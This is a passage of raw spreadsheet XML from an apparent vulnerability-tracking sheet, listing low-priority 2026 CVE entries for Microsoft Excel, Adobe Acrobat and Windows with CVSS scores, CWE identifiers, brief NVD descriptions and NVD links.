t="inlineStr" /><c r="M1305" s="5" t="inlineStr" /><c r="N1305" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1305" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1305" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1305" s="5" t="inlineStr" /><c r="R1305" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1305"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05" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80160</t></is></c></row><row r="1306"><c r="A1306" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1306" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1306" s="5" t="inlineStr"><is><t>CVE-2026-80162</t></is></c><c r="D1306" s="5" t="n"><v>5.5</v></c><c r="E1306" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1306" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1306" s="5" t="inlineStr" /><c r="H1306" s="5" t="n"><v>0.002</v></c><c r="I1306" s="5" t="inlineStr" /><c r="J1306" s="5" t="inlineStr" /><c r="K1306" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1306" s="5" t="inlineStr" /><c r="M1306" s="5" t="inlineStr" /><c r="N1306" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1306" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1306" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1306" s="5" t="inlineStr" /><c r="R1306" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1306"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T1306" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80162</t></is></c></row><row r="1307"><c r="A1307" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1307" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1307" s="5" t="inlineStr"><is><t>CVE-2026-81387</t></is></c><c r="D1307" s="5" t="n"><v>5.5</v></c><c r="E1307" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1307" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1307" s="5" t="inlineStr" /><c r="H1307" s="5" t="n"><v>0.004</v></c><c r="I1307" s="5" t="inlineStr" /><c r="J1307" s="5" t="inlineStr" /><c r="K1307" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1307" s="5" t="inlineStr" /><c r="M1307" s="5" t="inlineStr" /><c r="N1307" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1307" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1307" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1307" s="5" t="inlineStr" /><c r="R1307" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="S1307" s="5" t="inlineStr"><is><t>Exposure of sensitive system information to an unauthorized control sphere in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1307" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81387</t></is></c></row><row r="1308"><c r="A1308" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1308" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1308" s="5" t="inlineStr"><is><t>CVE-2026-81390</t></is></c><c r="D1308" s="5" t="n"><v>5.5</v></c><c r="E1308" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1308" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1308" s="5" t="inlineStr" /><c r="H1308" s="5" t="n"><v>0.004</v></c><c r="I1308" s="5" t="inlineStr" /><c r="J1308" s="5" t="inlineStr" /><c r="K1308" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:office_online_server</t></is></c><c r="L1308" s="5" t="inlineStr" /><c r="M1308" s="5" t="inlineStr" /><c r="N1308" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1308" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1308" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1308" s="5" t="inlineStr" /><c r="R1308" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1308" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1308" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81390</t></is></c></row><row r="1309"><c r="A1309" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1309" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1309" s="5" t="inlineStr"><is><t>CVE-2026-81391</t></is></c><c r="D1309" s="5" t="n"><v>5.5</v></c><c r="E1309" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1309" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1309" s="5" t="inlineStr" /><c r="H1309" s="5" t="n"><v>0.004</v></c><c r="I1309" s="5" t="inlineStr" /><c r="J1309" s="5" t="inlineStr" /><c r="K1309" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1309" s="5" t="inlineStr" /><c r="M1309" s="5" t="inlineStr" /><c r="N1309" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1309" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1309" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1309" s="5" t="inlineStr" /><c r="R1309" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S1309" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1309" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81391</t></is></c></row><row r="1310"><c r="A1310" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1310" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1310" s="5" t="inlineStr"><is><t>CVE-2026-81392</t></is></c><c r="D1310" s="5" t="n"><v>5.5</v></c><c r="E1310" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1310" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1310" s="5" t="inlineStr" /><c r="H1310" s="5" t="n"><v>0.005</v></c><c r="I1310" s="5" t="inlineStr" /><c r="J1310" s="5" t="inlineStr" /><c r="K1310" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1310" s="5" t="inlineStr" /><c r="M1310" s="5" t="inlineStr" /><c r="N1310" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1310" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1310" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1310" s="5" t="inlineStr" /><c r="R1310" s="5" t="inlineStr"><is><t>CWE-125, CWE-20</t></is></c><c r="S1310" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1310" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81392</t></is></c></row><row r="1311"><c r="A1311" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1311" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1311" s="5" t="inlineStr"><is><t>CVE-2026-81393</t></is></c><c r="D1311" s="5" t="n"><v>5.5</v></c><c r="E1311" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1311" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1311" s="5" t="inlineStr" /><c r="H1311" s="5" t="n"><v>0.004</v></c><c r="I1311" s="5" t="inlineStr" /><c r="J1311" s="5" t="inlineStr" /><c r="K1311" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1311" s="5" t="inlineStr" /><c r="M1311" s="5" t="inlineStr" /><c r="N1311" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1311" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1311" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1311" s="5" t="inlineStr" /><c r="R1311" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1311" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1311" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81393</t></is></c></row><row r="1312"><c r="A1312" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1312" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1312" s="5" t="inlineStr"><is><t>CVE-2026-81394</t></is></c><c r="D1312" s="5" t="n"><v>5.5</v></c><c r="E1312" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1312" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1312" s="5" t="inlineStr" /><c r="H1312" s="5" t="n"><v>0.004</v></c><c r="I1312" s="5" t="inlineStr" /><c r="J1312" s="5" t="inlineStr" /><c r="K1312" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1312" s="5" t="inlineStr" /><c r="M1312" s="5" t="inlineStr" /><c r="N1312" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1312" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1312" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1312" s="5" t="inlineStr" /><c r="R1312" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="S1312" s="5" t="inlineStr"><is><t>Exposure of sensitive system information to an unauthorized control sphere in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1312" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81394</t></is></c></row><row r="1313"><c r="A1313" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1313" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1313" s="5" t="inlineStr"><is><t>CVE-2026-81395</t></is></c><c r="D1313" s="5" t="n"><v>5.5</v></c><c r="E1313" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1313" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1313" s="5" t="inlineStr" /><c r="H1313" s="5" t="n"><v>0.005</v></c><c r="I1313" s="5" t="inlineStr" /><c r="J1313" s="5" t="inlineStr" /><c r="K1313" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1313" s="5" t="inlineStr" /><c r="M1313" s="5" t="inlineStr" /><c r="N1313" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1313" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1313" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1313" s="5" t="inlineStr" /><c r="R1313" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1313" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1313" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81395</t></is></c></row><row r="1314"><c r="A1314" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1314" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1314" s="5" t="inlineStr"><is><t>CVE-2026-81399</t></is></c><c r="D1314" s="5" t="n"><v>5.5</v></c><c r="E1314" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1314" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1314" s="5" t="inlineStr" /><c r="H1314" s="5" t="n"><v>0.004</v></c><c r="I1314" s="5" t="inlineStr" /><c r="J1314" s="5" t="inlineStr" /><c r="K1314" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1314" s="5" t="inlineStr" /><c r="M1314" s="5" t="inlineStr" /><c r="N1314" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1314" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1314" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1314" s="5" t="inlineStr" /><c r="R1314" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1314" s="5" t="inlineStr"><is><t>Buffer over-read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1314" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81399</t></is></c></row><row r="1315"><c r="A1315" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1315" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1315" s="5" t="inlineStr"><is><t>CVE-2026-81400</t></is></c><c r="D1315" s="5" t="n"><v>5.5</v></c><c r="E1315" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1315" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1315" s="5" t="inlineStr" /><c r="H1315" s="5" t="n"><v>0.004</v></c><c r="I1315" s="5" t="inlineStr" /><c r="J1315" s="5" t="inlineStr" /><c r="K1315" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1315" s="5" t="inlineStr" /><c r="M1315" s="5" t="inlineStr" /><c r="N1315" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1315" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1315" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1315" s="5" t="inlineStr" /><c r="R1315" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1315" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1315" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81400</t></is></c></row><row r="1316"><c r="A1316" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1316" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1316" s="5" t="inlineStr"><is><t>CVE-2026-81401</t></is></c><c r="D1316" s="5" t="n"><v>5.5</v></c><c r="E1316" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1316" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1316" s="5" t="inlineStr" /><c r="H1316" s="5" t="n"><v>0.005</v></c><c r="I1316" s="5" t="inlineStr" /><c r="J1316" s="5" t="inlineStr" /><c r="K1316" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:office_online_server</t></is></c><c r="L1316" s="5" t="inlineStr" /><c r="M1316" s="5" t="inlineStr" /><c r="N1316" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1316" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1316" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1316" s="5" t="inlineStr" /><c r="R1316" s="5" t="inlineStr"><is><t>CWE-843</t></is></c><c r="S1316" s="5" t="inlineStr"><is><t>Access of resource using incompatible type ('type confusion') in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1316" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81401</t></is></c></row><row r="1317"><c r="A1317" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1317" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1317" s="5" t="inlineStr"><is><t>CVE-2026-81958</t></is></c><c r="D1317" s="5" t="n"><v>5.5</v></c><c r="E1317" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1317" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1317" s="5" t="inlineStr" /><c r="H1317" s="5" t="n"><v>0.004</v></c><c r="I1317" s="5" t="inlineStr" /><c r="J1317" s="5" t="inlineStr" /><c r="K1317" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1317" s="5" t="inlineStr" /><c r="M1317" s="5" t="inlineStr" /><c r="N1317" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1317" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1317" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1317" s="5" t="inlineStr" /><c r="R1317" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S1317" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1317" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81958</t></is></c></row><row r="1318"><c r="A1318" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1318" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1318" s="5" t="inlineStr"><is><t>CVE-2026-81977</t></is></c><c r="D1318" s="5" t="n"><v>5.5</v></c><c r="E1318" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1318" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1318" s="5" t="inlineStr" /><c r="H1318" s="5" t="n"><v>0.002</v></c><c r="I1318" s="5" t="inlineStr" /><c r="J1318" s="5" t="inlineStr" /><c r="K1318" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1318" s="5" t="inlineStr" /><c r="M1318" s="5" t="inlineStr" /><c r="N1318" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1318" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1318" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1318" s="5" t="inlineStr" /><c r="R1318" s="5" t="inlineStr"><is><t>CWE-191</t></is></c><c r="S1318" s="5" t="inlineStr"><is><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is></c><c r="T1318" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81977</t></is></c></row><row r="1319"><c r="A1319" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1319" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1319" s="5" t="inlineStr"><is><t>CVE-2026-81978</t></is></c><c r="D1319" s="5" t="n"><v>5.5</v></c><c r="E1319" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1319" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1319" s="5" t="inlineStr" /><c r="H1319" s="5" t="n"><v>0.002</v></c><c r="I1319" s="5" t="inlineStr" /><c r="J1319" s="5" t="inlineStr" /><c r="K1319" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1319" s="5" t="inlineStr" /><c r="M1319" s="5" t="inlineStr" /><c r="N1319" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1319" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1319" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1319" s="5" t="inlineStr" /><c r="R1319" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1319"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19" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81978</t></is></c></row><row r="1320"><c r="A1320" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1320" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1320" s="5" t="inlineStr"><is><t>CVE-2026-81982</t></is></c><c r="D1320" s="5" t="n"><v>5.5</v></c><c r="E1320" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1320" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1320" s="5" t="inlineStr" /><c r="H1320" s="5" t="n"><v>0.002</v></c><c r="I1320" s="5" t="inlineStr" /><c r="J1320" s="5" t="inlineStr" /><c r="K1320" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1320" s="5" t="inlineStr" /><c r="M1320" s="5" t="inlineStr" /><c r="N1320" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1320" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1320" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1320" s="5" t="inlineStr" /><c r="R1320" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1320"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20" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81982</t></is></c></row><row r="1321"><c r="A1321" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1321" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1321" s="5" t="inlineStr"><is><t>CVE-2026-81984</t></is></c><c r="D1321" s="5" t="n"><v>5.5</v></c><c r="E1321" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1321" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1321" s="5" t="inlineStr" /><c r="H1321" s="5" t="n"><v>0.002</v></c><c r="I1321" s="5" t="inlineStr" /><c r="J1321" s="5" t="inlineStr" /><c r="K1321" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1321" s="5" t="inlineStr" /><c r="M1321" s="5" t="inlineStr" /><c r="N1321" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1321" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1321" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1321" s="5" t="inlineStr" /><c r="R1321" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1321"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T1321" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81984</t></is></c></row><row r="1322"><c r="A1322" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1322" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1322" s="5" t="inlineStr"><is><t>CVE-2026-81991</t></is></c><c r="D1322" s="5" t="n"><v>5.5</v></c><c r="E1322" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1322" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1322" s="5" t="inlineStr" /><c r="H1322" s="5" t="n"><v>0.002</v></c><c r="I1322" s="5" t="inlineStr" /><c r="J1322" s="5" t="inlineStr" /><c r="K1322" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1322" s="5" t="inlineStr" /><c r="M1322" s="5" t="inlineStr" /><c r="N1322" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1322" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1322" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1322" s="5" t="inlineStr" /><c r="R1322" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1322"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22" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81991</t></is></c></row><row r="1323"><c r="A1323" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1323" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1323" s="5" t="inlineStr"><is><t>CVE-2026-81993</t></is></c><c r="D1323" s="5" t="n"><v>5.5</v></c><c r="E1323" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1323" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1323" s="5" t="inlineStr" /><c r="H1323" s="5" t="n"><v>0.002</v></c><c r="I1323" s="5" t="inlineStr" /><c r="J1323" s="5" t="inlineStr" /><c r="K1323" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1323" s="5" t="inlineStr" /><c r="M1323" s="5" t="inlineStr" /><c r="N1323" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1323" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1323" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1323" s="5" t="inlineStr" /><c r="R1323" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1323" s="5" t="inlineStr"><is><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is></c><c r="T1323" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81993</t></is></c></row><row r="1324"><c r="A1324" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1324" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1324" s="5" t="inlineStr"><is><t>CVE-2026-82001</t></is></c><c r="D1324" s="5" t="n"><v>5.5</v></c><c r="E1324" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1324" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1324" s="5" t="inlineStr" /><c r="H1324" s="5" t="n"><v>0.002</v></c><c r="I1324" s="5" t="inlineStr" /><c r="J1324" s="5" t="inlineStr" /><c r="K1324" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1324" s="5" t="inlineStr" /><c r="M1324" s="5" t="inlineStr" /><c r="N1324" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1324" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1324" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1324" s="5" t="inlineStr" /><c r="R1324" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="S1324" s="5" t="inlineStr"><is><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is></c><c r="T1324" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82001</t></is></c></row><row r="1325"><c r="A1325" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1325" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1325" s="5" t="inlineStr"><is><t>CVE-2026-83501</t></is></c><c r="D1325" s="5" t="n"><v>5.5</v></c><c r="E1325" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1325" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1325" s="5" t="inlineStr" /><c r="H1325" s="5" t="n"><v>0.003</v></c><c r="I1325" s="5" t="inlineStr" /><c r="J1325" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1325" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L1325" s="5" t="inlineStr" /><c r="M1325" s="5" t="inlineStr" /><c r="N1325" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1325" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1325" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1325" s="5" t="inlineStr" /><c r="R1325" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1325" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Virtualization-Based Security (VBS) Enclave allows an authorized attacker to disclose information locally.</t></is></c><c r="T1325" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83501</t></is></c></row><row r="1326"><c r="A1326" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1326" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1326" s="5" t="inlineStr"><is><t>CVE-2026-83949</t></is></c><c r="D1326" s="5" t="n"><v>5.5</v></c><c r="E1326" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1326" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c 